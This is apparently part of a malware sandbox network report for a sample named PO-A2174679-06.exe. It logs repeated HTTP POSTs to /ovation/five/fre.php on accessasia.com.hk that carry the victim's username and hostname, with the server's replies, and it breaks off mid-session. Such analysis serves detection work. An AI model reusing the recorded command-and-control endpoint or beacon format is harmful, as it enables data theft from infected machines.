                            Feb 23, 2021 08:50:00.204687119 CET53614148.8.8.8192.168.2.5
                            Feb 23, 2021 08:50:00.970994949 CET6384753192.168.2.58.8.8.8
                            Feb 23, 2021 08:50:01.022571087 CET53638478.8.8.8192.168.2.5
                            Feb 23, 2021 08:50:02.258004904 CET6152353192.168.2.58.8.8.8
                            Feb 23, 2021 08:50:02.306612015 CET53615238.8.8.8192.168.2.5
                            Feb 23, 2021 08:50:04.100541115 CET5055153192.168.2.58.8.8.8
                            Feb 23, 2021 08:50:04.158838034 CET53505518.8.8.8192.168.2.5
                            Feb 23, 2021 08:50:05.398031950 CET6284753192.168.2.58.8.8.8
                            Feb 23, 2021 08:50:05.446899891 CET53628478.8.8.8192.168.2.5

DNS Queries

DNS Answers

HTTP Request Dependency Graph

• accessasia.com.hk

HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.5 | 49732 | 192.185.78.145 | 80 | C:\Users\user\Desktop\PO-A2174679-06.exe
Timestamp | kBytes transferred | Direction | Data
Feb 23, 2021 08:49:25.317523003 CET | 5360 | OUT | POST /ovation/five/fre.php HTTP/1.0
    User-Agent: Mozilla/4.08 (Charon; Inferno)
    Host: accessasia.com.hk
    Accept: */*
    Content-Type: application/octet-stream
    Content-Encoding: binary
    Content-Key: 5EB0DDEC
    Content-Length: 192
    Connection: close
Feb 23, 2021 08:49:25.483345032 CET | 5361 | OUT | Data Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 33 00 32 00 39 00 32 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54
    Data Ascii: 'ckav.rualfons632922DESKTOP-716T771k08F9C4E9C79A3B52B3F739430RcHRa
Feb 23, 2021 08:49:25.682240009 CET | 5361 | IN | HTTP/1.1 404 Not Found
    Date: Tue, 23 Feb 2021 07:49:25 GMT
    Server: Apache
    Upgrade: h2,h2c
    Connection: Upgrade, close
    Content-Length: 15
    Content-Type: text/html
    Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
    Data Ascii: File not found.


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.5 | 49733 | 192.185.78.145 | 80 | C:\Users\user\Desktop\PO-A2174679-06.exe
Timestamp | kBytes transferred | Direction | Data
Feb 23, 2021 08:49:26.296646118 CET | 5362 | OUT | POST /ovation/five/fre.php HTTP/1.0
    User-Agent: Mozilla/4.08 (Charon; Inferno)
    Host: accessasia.com.hk
    Accept: */*
    Content-Type: application/octet-stream
    Content-Encoding: binary
    Content-Key: 5EB0DDEC
    Content-Length: 192
    Connection: close
Feb 23, 2021 08:49:26.458527088 CET | 5362 | OUT | Data Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 33 00 32 00 39 00 32 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54
    Data Ascii: 'ckav.rualfons632922DESKTOP-716T771+08F9C4E9C79A3B52B3F739430yb2RR
Feb 23, 2021 08:49:26.654206038 CET | 5362 | IN | HTTP/1.1 404 Not Found
    Date: Tue, 23 Feb 2021 07:49:26 GMT
    Server: Apache
    Upgrade: h2,h2c
    Connection: Upgrade, close
    Content-Length: 15
    Content-Type: text/html
    Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
    Data Ascii: File not found.


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
10 | 192.168.2.5 | 49743 | 192.185.78.145 | 80 | C:\Users\user\Desktop\PO-A2174679-06.exe
Timestamp | kBytes transferred | Direction | Data
Feb 23, 2021 08:49:38.359103918 CET | 5384 | OUT | POST /ovation/five/fre.php HTTP/1.0
    User-Agent: Mozilla/4.08 (Charon; Inferno)
    Host: accessasia.com.hk
    Accept: */*
    Content-Type: application/octet-stream
    Content-Encoding: binary
    Content-Key: 5EB0DDEC
    Content-Length: 165
    Connection: close
Feb 23, 2021 08:49:38.523552895 CET | 5385 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 33 00 32 00 39 00 32 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54
    Data Ascii: (ckav.rualfons632922DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Feb 23, 2021 08:49:38.721246004 CET | 5385 | IN | HTTP/1.1 200 OK
    Date: Tue, 23 Feb 2021 07:49:38 GMT
    Server: Apache
    Upgrade: h2,h2c
    Connection: Upgrade, close
    Content-Length: 23
    Content-Type: text/html
    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
    Data Ascii: File not found.


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
11 | 192.168.2.5 | 49744 | 192.185.78.145 | 80 | C:\Users\user\Desktop\PO-A2174679-06.exe
Timestamp | kBytes transferred | Direction | Data
Feb 23, 2021 08:49:39.237473965 CET | 5386 | OUT | POST /ovation/five/fre.php HTTP/1.0
    User-Agent: Mozilla/4.08 (Charon; Inferno)
    Host: accessasia.com.hk
    Accept: */*
    Content-Type: application/octet-stream
    Content-Encoding: binary
    Content-Key: 5EB0DDEC
    Content-Length: 165
    Connection: close
Feb 23, 2021 08:49:39.403633118 CET | 5386 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 33 00 32 00 39 00 32 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54
    Data Ascii: (ckav.rualfons632922DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Feb 23, 2021 08:49:39.593688965 CET | 5387 | IN | HTTP/1.1 200 OK
    Date: Tue, 23 Feb 2021 07:49:39 GMT
    Server: Apache
    Upgrade: h2,h2c
    Connection: Upgrade, close
    Content-Length: 23
    Content-Type: text/html
    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
    Data Ascii: File not found.


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
12 | 192.168.2.5 | 49745 | 192.185.78.145 | 80 | C:\Users\user\Desktop\PO-A2174679-06.exe
Timestamp | kBytes transferred | Direction | Data
Feb 23, 2021 08:49:40.069118023 CET | 5387 | OUT | POST /ovation/five/fre.php HTTP/1.0
    User-Agent: Mozilla/4.08 (Charon; Inferno)
    Host: accessasia.com.hk
    Accept: */*
    Content-Type: application/octet-stream
    Content-Encoding: binary
    Content-Key: 5EB0DDEC
    Content-Length: 165
    Connection: close
Feb 23, 2021 08:49:40.235538006 CET | 5388 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 33 00 32 00 39 00 32 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54
    Data Ascii: (ckav.rualfons632922DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Feb 23, 2021 08:49:40.433582067 CET | 5388 | IN | HTTP/1.1 200 OK
    Date: Tue, 23 Feb 2021 07:49:40 GMT
    Server: Apache
    Upgrade: h2,h2c
    Connection: Upgrade, close
    Content-Length: 23
    Content-Type: text/html
    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
    Data Ascii: File not found.


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
13 | 192.168.2.5 | 49746 | 192.185.78.145 | 80 | C:\Users\user\Desktop\PO-A2174679-06.exe
Timestamp | kBytes transferred | Direction | Data
Feb 23, 2021 08:49:41.025088072 CET | 5389 | OUT | POST /ovation/five/fre.php HTTP/1.0
    User-Agent: Mozilla/4.08 (Charon; Inferno)
    Host: accessasia.com.hk
    Accept: */*
    Content-Type: application/octet-stream
    Content-Encoding: binary
    Content-Key: 5EB0DDEC
    Content-Length: 165
    Connection: close
Feb 23, 2021 08:49:41.186913967 CET | 5389 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 33 00 32 00 39 00 32 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54
    Data Ascii: (ckav.rualfons632922DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Feb 23, 2021 08:49:41.377275944 CET | 5389 | IN | HTTP/1.1 200 OK
    Date: Tue, 23 Feb 2021 07:49:41 GMT
    Server: Apache
    Upgrade: h2,h2c
    Connection: Upgrade, close
    Content-Length: 23
    Content-Type: text/html
    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
    Data Ascii: File not found.


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            14 | 192.168.2.5 | 49747 | 192.185.78.145 | 80 | C:\Users\user\Desktop\PO-A2174679-06.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 23, 2021 08:49:41.847378016 CET | 5390 | OUT | POST /ovation/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: accessasia.com.hk
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: 5EB0DDEC
                            Content-Length: 165
                            Connection: close
                            Feb 23, 2021 08:49:42.009980917 CET | 5391 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 33 00 32 00 39 00 32 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54
                            Data Ascii: (ckav.rualfons632922DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                            Feb 23, 2021 08:49:42.205475092 CET | 5391 | IN | HTTP/1.1 200 OK
                            Date: Tue, 23 Feb 2021 07:49:41 GMT
                            Server: Apache
                            Upgrade: h2,h2c
                            Connection: Upgrade, close
                            Content-Length: 23
                            Content-Type: text/html
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            15 | 192.168.2.5 | 49748 | 192.185.78.145 | 80 | C:\Users\user\Desktop\PO-A2174679-06.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 23, 2021 08:49:42.711982012 CET | 5392 | OUT | POST /ovation/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: accessasia.com.hk
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: 5EB0DDEC
                            Content-Length: 165
                            Connection: close
                            Feb 23, 2021 08:49:42.875757933 CET | 5392 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 33 00 32 00 39 00 32 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54
                            Data Ascii: (ckav.rualfons632922DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                            Feb 23, 2021 08:49:43.067840099 CET | 5392 | IN | HTTP/1.1 200 OK
                            Date: Tue, 23 Feb 2021 07:49:42 GMT
                            Server: Apache
                            Upgrade: h2,h2c
                            Connection: Upgrade, close
                            Content-Length: 23
                            Content-Type: text/html
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            16 | 192.168.2.5 | 49749 | 192.185.78.145 | 80 | C:\Users\user\Desktop\PO-A2174679-06.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 23, 2021 08:49:43.540302992 CET | 5393 | OUT | POST /ovation/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: accessasia.com.hk
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: 5EB0DDEC
                            Content-Length: 165
                            Connection: close
                            Feb 23, 2021 08:49:43.704432011 CET | 5393 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 33 00 32 00 39 00 32 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54
                            Data Ascii: (ckav.rualfons632922DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                            Feb 23, 2021 08:49:43.895927906 CET | 5394 | IN | HTTP/1.1 200 OK
                            Date: Tue, 23 Feb 2021 07:49:43 GMT
                            Server: Apache
                            Upgrade: h2,h2c
                            Connection: Upgrade, close
                            Content-Length: 23
                            Content-Type: text/html
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            17 | 192.168.2.5 | 49750 | 192.185.78.145 | 80 | C:\Users\user\Desktop\PO-A2174679-06.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 23, 2021 08:49:44.361483097 CET | 5395 | OUT | POST /ovation/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: accessasia.com.hk
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: 5EB0DDEC
                            Content-Length: 165
                            Connection: close
                            Feb 23, 2021 08:49:44.524343014 CET | 5395 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 33 00 32 00 39 00 32 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54
                            Data Ascii: (ckav.rualfons632922DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                            Feb 23, 2021 08:49:44.730729103 CET | 5395 | IN | HTTP/1.1 200 OK
                            Date: Tue, 23 Feb 2021 07:49:44 GMT
                            Server: Apache
                            Upgrade: h2,h2c
                            Connection: Upgrade, close
                            Content-Length: 23
                            Content-Type: text/html
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            18 | 192.168.2.5 | 49751 | 192.185.78.145 | 80 | C:\Users\user\Desktop\PO-A2174679-06.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 23, 2021 08:49:45.281075954 CET | 5396 | OUT | POST /ovation/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: accessasia.com.hk
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: 5EB0DDEC
                            Content-Length: 165
                            Connection: close
                            Feb 23, 2021 08:49:45.445209980 CET | 5396 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 33 00 32 00 39 00 32 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54
                            Data Ascii: (ckav.rualfons632922DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                            Feb 23, 2021 08:49:45.682168007 CET | 5397 | IN | HTTP/1.1 200 OK
                            Date: Tue, 23 Feb 2021 07:49:45 GMT
                            Server: Apache
                            Upgrade: h2,h2c
                            Connection: Upgrade, close
                            Content-Length: 23
                            Content-Type: text/html
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            19 | 192.168.2.5 | 49752 | 192.185.78.145 | 80 | C:\Users\user\Desktop\PO-A2174679-06.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 23, 2021 08:49:46.290244102 CET | 5397 | OUT | POST /ovation/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: accessasia.com.hk
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: 5EB0DDEC
                            Content-Length: 165
                            Connection: close
                            Feb 23, 2021 08:49:46.453449011 CET | 5398 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 33 00 32 00 39 00 32 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54
                            Data Ascii: (ckav.rualfons632922DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                            Feb 23, 2021 08:49:46.657223940 CET | 5398 | IN | HTTP/1.1 200 OK
                            Date: Tue, 23 Feb 2021 07:49:46 GMT
                            Server: Apache
                            Upgrade: h2,h2c
                            Connection: Upgrade, close
                            Content-Length: 23
                            Content-Type: text/html
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            2 | 192.168.2.5 | 49734 | 192.185.78.145 | 80 | C:\Users\user\Desktop\PO-A2174679-06.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 23, 2021 08:49:27.514702082 CET | 5363 | OUT | POST /ovation/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: accessasia.com.hk
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: 5EB0DDEC
                            Content-Length: 165
                            Connection: close
                            Feb 23, 2021 08:49:27.678800106 CET | 5363 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 33 00 32 00 39 00 32 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54
                            Data Ascii: (ckav.rualfons632922DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                            Feb 23, 2021 08:49:27.879473925 CET | 5364 | IN | HTTP/1.1 200 OK
                            Date: Tue, 23 Feb 2021 07:49:27 GMT
                            Server: Apache
                            Upgrade: h2,h2c
                            Connection: Upgrade, close
                            Content-Length: 23
                            Content-Type: text/html
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            20 | 192.168.2.5 | 49753 | 192.185.78.145 | 80 | C:\Users\user\Desktop\PO-A2174679-06.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 23, 2021 08:49:47.113450050 CET | 5399 | OUT | POST /ovation/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: accessasia.com.hk
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: 5EB0DDEC
                            Content-Length: 165
                            Connection: close
                            Feb 23, 2021 08:49:47.280649900 CET | 5400 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 33 00 32 00 39 00 32 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54
                            Data Ascii: (ckav.rualfons632922DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                            Feb 23, 2021 08:49:47.496956110 CET | 5426 | IN | HTTP/1.1 200 OK
                            Date: Tue, 23 Feb 2021 07:49:47 GMT
                            Server: Apache
                            Upgrade: h2,h2c
                            Connection: Upgrade, close
                            Content-Length: 23
                            Content-Type: text/html
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            21 | 192.168.2.5 | 49755 | 192.185.78.145 | 80 | C:\Users\user\Desktop\PO-A2174679-06.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 23, 2021 08:49:47.991494894 CET | 5470 | OUT | POST /ovation/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: accessasia.com.hk
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: 5EB0DDEC
                            Content-Length: 165
                            Connection: close
                            Feb 23, 2021 08:49:48.152970076 CET | 5491 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 33 00 32 00 39 00 32 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54
                            Data Ascii: (ckav.rualfons632922DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                            Feb 23, 2021 08:49:48.352315903 CET | 5501 | IN | HTTP/1.1 200 OK
                            Date: Tue, 23 Feb 2021 07:49:48 GMT
                            Server: Apache
                            Upgrade: h2,h2c
                            Connection: Upgrade, close
                            Content-Length: 23
                            Content-Type: text/html
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            22 | 192.168.2.5 | 49759 | 192.185.78.145 | 80 | C:\Users\user\Desktop\PO-A2174679-06.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 23, 2021 08:49:48.867384911 CET | 5546 | OUT | POST /ovation/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: accessasia.com.hk
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: 5EB0DDEC
                            Content-Length: 165
                            Connection: close
                            Feb 23, 2021 08:49:49.033982992 CET | 5548 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 33 00 32 00 39 00 32 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54
                            Data Ascii: (ckav.rualfons632922DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                            Feb 23, 2021 08:49:49.230602980 CET | 5557 | IN | HTTP/1.1 200 OK
                            Date: Tue, 23 Feb 2021 07:49:48 GMT
                            Server: Apache
                            Upgrade: h2,h2c
                            Connection: Upgrade, close
                            Content-Length: 23
                            Content-Type: text/html
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            23 | 192.168.2.5 | 49761 | 192.185.78.145 | 80 | C:\Users\user\Desktop\PO-A2174679-06.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 23, 2021 08:49:49.698286057 CET | 5734 | OUT | POST /ovation/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: accessasia.com.hk
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: 5EB0DDEC
                            Content-Length: 165
                            Connection: close
                            Feb 23, 2021 08:49:49.873977900 CET | 5738 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 33 00 32 00 39 00 32 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54
                            Data Ascii: (ckav.rualfons632922DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                            Feb 23, 2021 08:49:50.121752977 CET | 5747 | IN | HTTP/1.1 200 OK
                            Date: Tue, 23 Feb 2021 07:49:49 GMT
                            Server: Apache
                            Upgrade: h2,h2c
                            Connection: Upgrade, close
                            Content-Length: 23
                            Content-Type: text/html
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            24 | 192.168.2.5 | 49763 | 192.185.78.145 | 80 | C:\Users\user\Desktop\PO-A2174679-06.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 23, 2021 08:49:50.602565050 CET | 5949 | OUT | POST /ovation/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: accessasia.com.hk
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: 5EB0DDEC
                            Content-Length: 165
                            Connection: close
                            Feb 23, 2021 08:49:50.764679909 CET | 5950 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 33 00 32 00 39 00 32 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54
                            Data Ascii: (ckav.rualfons632922DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                            Feb 23, 2021 08:49:50.962508917 CET | 5958 | IN | HTTP/1.1 200 OK
                            Date: Tue, 23 Feb 2021 07:49:50 GMT
                            Server: Apache
                            Upgrade: h2,h2c
                            Connection: Upgrade, close
                            Content-Length: 23
                            Content-Type: text/html
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            25 | 192.168.2.5 | 49765 | 192.185.78.145 | 80 | C:\Users\user\Desktop\PO-A2174679-06.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 23, 2021 08:49:51.403125048 CET | 6010 | OUT | POST /ovation/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: accessasia.com.hk
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: 5EB0DDEC
                            Content-Length: 165
                            Connection: close
                            Feb 23, 2021 08:49:51.564685106 CET | 6011 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 33 00 32 00 39 00 32 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54
                            Data Ascii: (ckav.rualfons632922DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                            Feb 23, 2021 08:49:51.755176067 CET | 6011 | IN | HTTP/1.1 200 OK
                            Date: Tue, 23 Feb 2021 07:49:51 GMT
                            Server: Apache
                            Upgrade: h2,h2c
                            Connection: Upgrade, close
                            Content-Length: 23
                            Content-Type: text/html
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            26 | 192.168.2.5 | 49766 | 192.185.78.145 | 80 | C:\Users\user\Desktop\PO-A2174679-06.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 23, 2021 08:49:52.189174891 CET | 6012 | OUT | POST /ovation/five/fre.php HTTP/1.0
